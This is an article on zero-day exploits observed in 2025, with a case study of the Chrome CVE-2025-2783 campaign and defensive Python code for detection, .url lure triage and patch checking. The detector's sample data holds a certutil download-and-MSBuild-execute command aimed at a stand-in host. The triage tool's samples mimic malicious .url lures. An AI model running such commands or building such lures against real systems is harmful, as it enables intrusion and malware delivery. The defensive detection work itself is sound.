Zero-day exploits, which target vulnerabilities unknown to software vendors at the time of exploitation, remain one of the most critical threats in cybersecurity. In 2025, the cybersecurity landscape has continued to evolve, with zero-day exploits being leveraged by a range of threat actors, including nation-state groups, commercial surveillance vendors (CSVs), and financially motivated cybercriminals. These exploits are particularly dangerous because they bypass traditional security measures, such as signature-based antivirus or intrusion detection systems, and exploit unpatched flaws, leaving systems vulnerable until vendors release fixes. This article examines recent examples of zero-day exploits observed in 2025, drawing on available data to highlight their characteristics, impact, and mitigation strategies, and provides a detailed case study of one significant exploit to illustrate their real-world implications.
The Context of Zero-Day Exploits in 2025
The year 2025 has continued trends observed in previous years, with zero-day exploits targeting a mix of end-user platforms (e.g., browsers, mobile devices) and enterprise technologies (e.g., security software, networking appliances). Google's Threat Intelligence Group (GTIG) tracked 75 zero-days exploited in the wild in 2024, down from 98 in 2023 but up from 63 in 2022, and reported that 44% of the 2024 zero-days targeted enterprise-specific technologies; that enterprise share has persisted into 2025. The growing sophistication of commercial spyware vendors, together with reports of AI-assisted tooling accelerating exploit development, has added to the potency of zero-day exploits.
Zero-day exploits in 2025 are characterized by:
- Diverse Targets: Vulnerabilities in widely used software, such as Microsoft Windows, Google Chrome, and Apple's Core Media framework, as well as enterprise solutions like Ivanti appliances, are prime targets.
- Sophisticated Attackers: Nation-state actors, particularly those attributed to the People's Republic of China (PRC), and CSVs dominate zero-day exploitation, often for espionage or surveillance purposes.
- Rapid Exploitation: Attackers are weaponizing vulnerabilities faster, in some cases within a day of public disclosure (at which point the bug is an n-day for anyone who has patched, but still effectively a zero-day for systems that have not), with automated tooling shortening the time from advisory to working exploit.
- Complex Delivery Methods: Phishing, malvertising, and social engineering tactics, such as ClickFix-style lures, are commonly used to deliver zero-day exploits.
The following sections highlight specific examples of zero-day exploits observed in 2025, based on available data, and provide a deeper analysis of one case to illustrate their impact.
Recent Zero-Day Exploits in 2025
1. Apple Core Media Framework Zero-Day (CVE-2025-24085)
In January 2025, Apple patched a zero-day vulnerability in its Core Media framework (CVE-2025-24085), a use-after-free bug affecting iPhones, iPads, Macs, Apple TVs, Apple Watches and Vision Pro. A malicious application could exploit it to elevate privileges and execute arbitrary code through crafted media handling. Apple stated that the flaw may have been actively exploited against versions of iOS before iOS 17.2, and shipped fixes in iOS 18.3, iPadOS 18.3, macOS Sequoia 15.3, watchOS 11.3, tvOS 18.3 and visionOS 2.3. The exploit's severity stemmed from the breadth of affected devices and from the exposure of media-processing components, which parse untrusted input by design.
2. Google Chrome Zero-Days (CVE-2025-2783, CVE-2025-5419, CVE-2025-6554)
Google Chrome faced multiple zero-day exploits in 2025, reflecting its status as a high-value target due to its widespread use. Three notable vulnerabilities were:
- CVE-2025-2783: An incorrect-handle flaw in Chrome's Mojo inter-process communication layer on Windows that allowed a sandbox escape once a victim opened a malicious link. Kaspersky detected it in March 2025 in a campaign it named Operation ForumTroll, which targeted Russian organizations with phishing emails disguised as invitations to the Primakov Readings forum; Positive Technologies later attributed the activity to the TaxOff group and its Trinper backdoor. Google patched the flaw on March 25, 2025.
- CVE-2025-5419: A high-severity out-of-bounds read and write in Chrome's V8 engine, reported by Google TAG in late May 2025 and exploited via crafted HTML pages. Google first pushed a configuration change to the stable channel and then shipped a patched build in early June.
- CVE-2025-6554: A type confusion in V8, reported by Google TAG on June 25, 2025, that allowed arbitrary code execution through crafted web pages. It was actively exploited, and Google again pushed a configuration mitigation within a day, followed by a patched release.
These exploits underscore Chrome’s vulnerability to zero-days, particularly in its V8 engine, and the rapid response required to protect users.
3. Microsoft Windows CLFS Zero-Day (CVE-2025-29824)
In April 2025, Microsoft patched a zero-day in the Common Log File System (CLFS) driver (CVE-2025-29824), a use-after-free enabling elevation of privilege that the Storm-2460 group exploited to deploy the PipeMagic backdoor. Microsoft reported a small number of victims, including organizations in the United States and elsewhere. In the observed chain, the attackers used the certutil utility to download a malicious MSBuild file from a compromised legitimate website, ran MSBuild on it to decrypt and launch PipeMagic in memory, and then exploited CLFS to obtain SYSTEM privileges; Microsoft observed ransomware deployment following the escalation in some cases. Symantec separately reported the same CLFS exploit in an intrusion where the Grixba information stealer was deployed but ransomware was not. Microsoft released the fix on April 8, 2025, urging immediate updates. This exploit illustrates the trend of zero-days in Windows components being used for post-compromise escalation rather than initial access.
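The certutil-then-MSBuild chain described above is a good candidate for sequence-based detection, since neither step is rare on its own but the pairing on one host within minutes is. The following is an added example, not code from the original article or from any vendor: a small correlator run over constructed process-creation events. The field names (host, time, image, cmdline) are an assumed normalisation of Sysmon Event ID 1 or EDR telemetry, not a real schema, and the 15-minute correlation window is an assumption.

```python
from datetime import datetime, timedelta

# Constructed process-creation events (assumed normalisation of Sysmon Event ID 1
# or EDR telemetry; the field names are not a real vendor schema).
EVENTS = [
    # HOST-A: certutil downloads a file, then MSBuild runs it minutes later.
    {"host": "HOST-A", "time": "2025-04-07T09:12:03",
     "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": r"certutil -urlcache -split -f https://compromised-site.example/c.msbuild C:\Users\Public\c.msbuild"},
    {"host": "HOST-A", "time": "2025-04-07T09:13:41",
     "image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
     "cmdline": r"MSBuild.exe C:\Users\Public\c.msbuild"},
    # HOST-B: legitimate certutil and MSBuild use, unrelated to each other.
    {"host": "HOST-B", "time": "2025-04-07T10:00:00",
     "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": r"certutil -hashfile C:\build\setup.exe SHA256"},
    {"host": "HOST-B", "time": "2025-04-07T10:01:00",
     "image": r"C:\Program Files\Microsoft Visual Studio\2022\Community\MSBuild\Current\Bin\MSBuild.exe",
     "cmdline": r"MSBuild.exe C:\build\App.sln /t:Build"},
    # HOST-C: a download and an MSBuild run of the same file, but hours apart.
    {"host": "HOST-C", "time": "2025-04-07T11:00:00",
     "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": r"certutil -urlcache -f https://cdn.example/build.proj C:\Temp\build.proj"},
    {"host": "HOST-C", "time": "2025-04-07T13:30:00",
     "image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
     "cmdline": r"MSBuild.exe C:\Temp\build.proj"},
]

WINDOW = timedelta(minutes=15)  # assumed correlation window


def basename(path):
    """Last path component, lower-cased and unquoted; accepts / or \\ separators."""
    return path.strip('"').replace("/", "\\").rstrip("\\").rsplit("\\", 1)[-1].lower()


def parse_certutil_download(cmdline):
    """Return (url, output_basename) for a 'certutil -urlcache ... <url> [<out>]' download, else None.

    If no output path follows the URL, certutil only populates the URL cache, so the
    file name is reported as None."""
    toks = cmdline.split()
    if not any(t.lower() in ("-urlcache", "/urlcache") for t in toks):
        return None
    urls = [t for t in toks if t.lower().startswith(("http://", "https://"))]
    if not urls:
        return None
    out = toks[-1]
    return (urls[-1], None if out == urls[-1] else basename(out))


def detect(events):
    """Emit a medium alert for every certutil download and a high alert when MSBuild
    later executes the downloaded file on the same host inside WINDOW."""
    alerts = []
    downloads = {}  # host -> list of (time, url, output basename)
    for ev in sorted(events, key=lambda e: e["time"]):
        t = datetime.fromisoformat(ev["time"])
        image = basename(ev["image"])
        if image == "certutil.exe":
            dl = parse_certutil_download(ev["cmdline"])
            if dl is None:
                continue
            url, out = dl
            downloads.setdefault(ev["host"], []).append((t, url, out))
            alerts.append({"severity": "medium", "rule": "certutil_download",
                           "host": ev["host"], "url": url, "file": out})
        elif image == "msbuild.exe":
            # Compare basenames of the MSBuild arguments against earlier downloads.
            args = {basename(tok) for tok in ev["cmdline"].split()[1:]}
            for t0, url, out in downloads.get(ev["host"], []):
                if out and out in args and t - t0 <= WINDOW:
                    alerts.append({"severity": "high", "rule": "certutil_to_msbuild",
                                   "host": ev["host"], "url": url, "file": out})
    return alerts


if __name__ == "__main__":
    for alert in detect(EVENTS):
        print(alert)
```

Matching on the basename of the downloaded file rather than on the full command line keeps the rule robust to quoting and path differences; in production the medium-severity certutil alert would usually be suppressed for hosts where certutil downloads are an approved workflow, while the sequence alert stays on.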
4. Microsoft Windows MSHTML Zero-Day (CVE-2024-38112)
Although first exploited in 2024, the Windows MSHTML vulnerability CVE-2024-38112 continued to see activity into early 2025. Microsoft classed it as a spoofing flaw: a malicious Internet shortcut (.URL) file carrying an mhtml:-prefixed URL forced Windows to open the target in the retired Internet Explorer engine rather than Edge, which attackers used to deliver information-stealing malware. Microsoft patched it in July 2024, and CISA added it to its Known Exploited Vulnerabilities catalog, listing it among 116 vulnerabilities actively exploited in 2024, 28 of them in Windows. Its persistence into 2025 underscores the challenges of patching legacy components and the prolonged exploitation window for unpatched systems.
5. Microsoft Windows NTFS Zero-Days (CVE-2025-24991, CVE-2025-24993)
In March 2025, Microsoft patched two zero-day vulnerabilities in the NTFS file system driver, both exploited in the wild: CVE-2025-24991, an out-of-bounds read that discloses kernel memory, and CVE-2025-24993, a heap-based buffer overflow enabling local code execution. Exploitation requires tricking a user into mounting a specially crafted virtual hard disk (VHD). Microsoft did not publish details of the in-the-wild use. The PipeMagic backdoor that ESET reported the same month was tied to a separate Win32k kernel zero-day fixed in the same Patch Tuesday (CVE-2025-24983), which had been used since 2023 against older Windows versions such as Windows 8.1 and Server 2012 R2, highlighting the risks in unsupported or unpatched systems.
6. Microsoft Management Console Zero-Day (CVE-2025-26633)
The same March 2025 Patch Tuesday fixed a zero-day in the Microsoft Management Console (CVE-2025-26633), a security-feature bypass in how MMC handles .msc console files that allowed attackers to execute code if a user opened a malicious file. Trend Micro reported its use by the group it tracks as Water Gamayun (EncryptHub), and the lure targets administrators, the people most likely to open console files. Microsoft's patching mitigated the threat, but the exploit's reliance on user interaction underscores the role of social engineering in zero-day attacks.
7. Stealth Falcon’s Microsoft Zero-Day (CVE-2025-33053)
In June 2025, Check Point Research disclosed a zero-day (CVE-2025-33053) exploited by the Stealth Falcon APT group against entities in the Middle East and Africa. The flaw lay in how Windows handles Internet shortcut (.url) files together with WebDAV, and it gave remote code execution: the shortcut launched a legitimate Windows binary (a living-off-the-land binary, or LOLBin) with its working directory set to an attacker-controlled WebDAV server, so the binary loaded a dependency from that remote share instead of from the local system. Microsoft patched the vulnerability on June 10, 2025, following responsible disclosure. The campaign's tooling, including code protected with Code Virtualizer, reflects the advanced tradecraft of espionage-focused groups.
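Both the MSHTML case (CVE-2024-38112) and the Stealth Falcon case (CVE-2025-33053) turn on the contents of an Internet shortcut (.url) file, which is a plain INI file with an [InternetShortcut] section. The following is an added example, not code from the original article or from Check Point: a parser for that format plus triage heuristics for the two lure styles described above and for the older remote-IconFile trick. The sample files are constructed from public descriptions of those techniques; their hosts, paths and values are assumptions, not samples from the campaigns.

```python
import configparser
import re

# Constructed .url files. The suspicious ones are modelled on public descriptions of the
# CVE-2024-38112 lure (mhtml: prefix forcing Internet Explorer) and the CVE-2025-33053 lure
# (a local LOLBin with a WebDAV working directory); every value is an assumption.
SAMPLES = {
    "quarterly-report.url": (
        "[InternetShortcut]\n"
        "URL=https://intranet.example/reports/q1\n"
    ),
    "invoice-pdf.url": (
        "[InternetShortcut]\n"
        "URL=mhtml:http://files.example.net/inv.htm!x-usc:http://files.example.net/inv.htm\n"
        "IconFile=C:\\Windows\\System32\\imageres.dll\n"
        "IconIndex=98\n"
    ),
    "briefing.url": (
        "[InternetShortcut]\n"
        "URL=file:///C:/Program Files/Internet Explorer/iediagcmd.exe\n"
        "WorkingDirectory=\\\\203.0.113.7@SSL\\DavWWWRoot\\share\n"
        "IconFile=C:\\Windows\\System32\\shell32.dll\n"
        "IconIndex=1\n"
    ),
    "icon-leak.url": (
        "[InternetShortcut]\n"
        "URL=https://www.example.com/\n"
        "IconFile=\\\\203.0.113.9\\icons\\doc.ico\n"
    ),
}

UNC = re.compile(r"^(\\\\|//)")                       # \\host\share or //host/share
LOCAL_EXE = re.compile(r"^(file:///?)?[a-z]:[\\/].*\.(exe|dll|cpl|scr)\s*$", re.I)


def parse_url_file(text):
    """Parse the INI-style .url format; returns the [InternetShortcut] fields with
    lower-cased keys, or {} if the section is missing. strict=False tolerates the
    duplicate keys that hand-built lures sometimes contain."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.read_string(text)
    if not cp.has_section("InternetShortcut"):
        return {}
    return dict(cp.items("InternetShortcut"))


def assess(fields):
    """Return a list of human-readable findings; an empty list means nothing suspicious."""
    findings = []
    url = fields.get("url", "")
    wd = fields.get("workingdirectory", "")
    icon = fields.get("iconfile", "")
    u = url.lower()
    if u.startswith("mhtml:") or "!x-usc:" in u:
        findings.append("URL uses an mhtml:/x-usc: prefix that forces Internet Explorer (CVE-2024-38112 style)")
    if LOCAL_EXE.match(url):
        findings.append("URL launches a local executable instead of a web address")
        if UNC.match(wd):
            findings.append("working directory is a UNC path, so the launched binary may load "
                            "dependencies from a remote share (CVE-2025-33053 style)")
    if UNC.match(wd) and ("@ssl" in wd.lower() or "davwwwroot" in wd.lower()):
        findings.append("working directory uses WebDAV UNC syntax")
    if UNC.match(icon):
        findings.append("icon is fetched from a remote UNC path (NTLM hash leak or beacon on render)")
    return findings


def triage(samples):
    """Map file name -> findings for a dict of file contents."""
    return {name: assess(parse_url_file(text)) for name, text in samples.items()}


if __name__ == "__main__":
    for name, findings in triage(SAMPLES).items():
        print(name, "->", findings or "clean")
```

The heuristics are deliberately conservative: a .url pointing at a local executable is unusual but not proof of attack, so it is reported on its own and escalated only when combined with a remote working directory. Running this over mail-gateway attachments is more useful than a signature on any one campaign's file, because the file format, not the specific payload, is what both bugs abused.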
8. 7-Zip Zero-Day (CVE-2025-0411)
In early 2025, Trend Micro's Zero Day Initiative disclosed that a Mark-of-the-Web bypass in the 7-Zip archiver (CVE-2025-0411) had been exploited as a zero-day since September 2024: files extracted from an archive nested inside another archive did not inherit the outer archive's Mark-of-the-Web, so Windows raised no SmartScreen warning when the victim ran them. Russian threat actors used the flaw in phishing campaigns against Ukrainian organizations to deliver the SmokeLoader malware. The fix shipped in 7-Zip 24.09 in November 2024, but because 7-Zip has no automatic update mechanism, older installations remained exposed well into 2025, emphasizing the risks in widely used utilities.
Case Study: Google Chrome Zero-Day (CVE-2025-2783) and the TaxOff Campaign
Background
One of the most notable zero-day exploits of 2025 was CVE-2025-2783, a sandbox escape caused by an incorrect handle being provided in Chrome's Mojo inter-process communication layer on Windows. The high-severity flaw (CVSS score: 8.3) let attackers break out of Chrome's renderer sandbox and run code on the host; Kaspersky recovered the sandbox-escape component but not the renderer exploit chained in front of it. The TaxOff threat group used it in March 2025 against Russian organizations, delivered through phishing emails disguised as invitations to the Primakov Readings forum, in a campaign Kaspersky named Operation ForumTroll.
Exploitation
The attack began with a phishing campaign, where victims received emails containing a malicious link. Clicking the link directed users to a fake website hosting the CVE-2025-2783 exploit, which triggered a one-click compromise. The exploit installed the Trinper backdoor, a sophisticated malware designed for long-term persistence and data exfiltration. The campaign also used a variation involving a ZIP archive with a Windows shortcut file, executing PowerShell commands to deploy the backdoor via the Donut loader or Cobalt Strike. Positive Technologies noted tactical similarities with another group, Team46, suggesting possible overlap.
Impact
The CVE-2025-2783 exploit had significant implications:
- Targeted Espionage: The attack focused on Russian organizations, including media outlets, educational institutions and government bodies, most likely for intelligence gathering, highlighting how zero-days are reserved for high-value targets.
- Widespread Use of Chrome: Chrome's global popularity made the exploit a broad threat, though the campaign itself was geographically targeted.
- Persistent Access: The Trinper backdoor enabled attackers to maintain long-term access, facilitating data theft and further attacks.
- Rapid Spread: The phishing-based delivery allowed the exploit to reach multiple victims quickly, although each victim still had to open the link.
Response
Kaspersky detected the exploit in mid-March 2025 and reported it to Google, which shipped a fix on March 25, 2025 in Chrome 134.0.6998.177/.178 for Windows. Users were urged to update immediately, and because the bug sat in Chromium code, other Chromium-based browsers needed their own updates. The rapid response limited the exploitation window, but unpatched systems remained vulnerable.
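"Update to version X or later" is only actionable if the comparison is done on the four numeric components rather than on the version string, since "134.0.6998.9" sorts after "134.0.6998.177" as text. The following is an added example, not code from the original article or from Google: a checker that maps each of the three Chrome zero-days discussed on this page to the first stable build containing its fix and sweeps a constructed inventory. The fixed-build numbers are taken from Google's stable channel update posts for the Windows and Linux builds and are an assumption to confirm against the Chrome Releases blog for your platform, since Mac builds can carry a different last component.

```python
from typing import Dict, List, Tuple

# First stable builds carrying each fix (Windows/Linux numbers from Google's Chrome
# Releases posts; assumption: confirm for your platform before relying on them).
FIXED_IN: Dict[str, Tuple[int, int, int, int]] = {
    "CVE-2025-2783": (134, 0, 6998, 177),
    "CVE-2025-5419": (137, 0, 7151, 68),
    "CVE-2025-6554": (138, 0, 7204, 96),
}

# Constructed inventory: hostname -> Chrome version as reported by the endpoint agent.
INVENTORY = {
    "ws-01": "134.0.6998.165",   # pre-dates all three fixes
    "ws-02": "134.0.6998.178",   # has the CVE-2025-2783 fix, lacks the later ones
    "ws-03": "138.0.7204.97",    # current as of the last fix on the list
    "ws-04": "139.0.7258.66",    # newer branch: smaller last component is still newer
    "ws-05": "not installed",    # agent could not read a version
}


def parse_version(s: str) -> Tuple[int, int, int, int]:
    """Chrome versions are major.minor.build.patch; anything else is rejected."""
    parts = s.strip().split(".")
    if len(parts) != 4 or not all(p.isdigit() for p in parts):
        raise ValueError(f"not a Chrome version string: {s!r}")
    major, minor, build, patch = (int(p) for p in parts)
    return (major, minor, build, patch)


def unpatched_cves(version: str) -> List[str]:
    """CVEs on the list whose fix is newer than the installed build. Tuple comparison
    handles branch boundaries: 139.x is newer than 138.0.7204.96 regardless of patch."""
    installed = parse_version(version)
    return [cve for cve, fix in FIXED_IN.items() if installed < fix]


def sweep(inventory: Dict[str, str]) -> Dict[str, object]:
    """Split an inventory into hosts needing updates (with the CVEs they miss) and hosts
    whose version could not be parsed, which need a manual check rather than silence."""
    report: Dict[str, object] = {"needs_update": {}, "unparsable": []}
    for host, version in inventory.items():
        try:
            missing = unpatched_cves(version)
        except ValueError:
            report["unparsable"].append(host)
            continue
        if missing:
            report["needs_update"][host] = missing
    return report


if __name__ == "__main__":
    result = sweep(INVENTORY)
    for host, cves in result["needs_update"].items():
        print(f"{host}: update required, missing fixes for {', '.join(cves)}")
    for host in result["unparsable"]:
        print(f"{host}: version unreadable, check manually")
```

Treating an unreadable version as a finding rather than skipping it matters in practice: an endpoint that reports nothing is the one most likely to be running a stale, manually installed browser.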
Lessons Learned
This exploit highlighted the dangers of zero-days in popular browsers and the effectiveness of social engineering in delivering them. It also emphasized the importance of timely updates and user awareness to combat phishing attacks. The use of advanced malware like Trinper underscores the need for behavioral detection tools to identify post-compromise activities.
Trends and Observations in 2025
The 2025 zero-day exploits reflect several trends:
- Enterprise Focus: The increasing targeting of enterprise technologies, such as Ivanti appliances and security software, indicates a shift toward compromising network infrastructure.
- AI-Assisted Attacks: Reports describe AI tooling being used to accelerate exploit development and to vary payloads, which makes static, signature-based detection less reliable.
- Espionage Dominance: Over 50% of zero-days in 2024 were used for espionage, a trend continuing into 2025 with groups like Stealth Falcon and TaxOff.
- Commercial Surveillance Vendors: CSVs continue to exploit zero-days, particularly on mobile devices, including exploit chains that require physical access to the device and are delivered over USB.
Mitigation Strategies
To protect against zero-day exploits in 2025, organizations should:
- Prompt Patching: Apply security updates immediately, as seen with the rapid patches for CVE-2025-24085 and CVE-2025-2783.
- Behavioral Detection: Use EDR tools to detect anomalous behavior, such as unexpected privilege escalation or network traffic.
- Network Segmentation: Isolate critical systems to limit the spread of an attack.
- User Education: Train users to recognize phishing and social engineering tactics, as seen in the TaxOff campaign.
- Threat Intelligence: Monitor threat intelligence feeds for early warnings of zero-day exploits.
- Zero Trust Architecture: Enforce strict access controls and continuous verification to reduce attack surfaces.
Conclusion
Zero-day exploits in 2025 continue to pose a significant threat due to their ability to bypass traditional defenses and target unpatched vulnerabilities. Examples like the Chrome CVE-2025-2783 exploit, Apple’s Core Media flaw, and Microsoft’s CLFS and NTFS vulnerabilities demonstrate the diverse attack surfaces, from browsers to enterprise systems. The TaxOff campaign’s use of CVE-2025-2783 illustrates the sophistication of modern zero-day attacks, combining phishing, sandbox escapes, and persistent malware. As attackers leverage AI and target enterprise technologies, organizations must adopt proactive security measures, including rapid patching, advanced monitoring, and user education, to mitigate the risks of these potent cyber threats.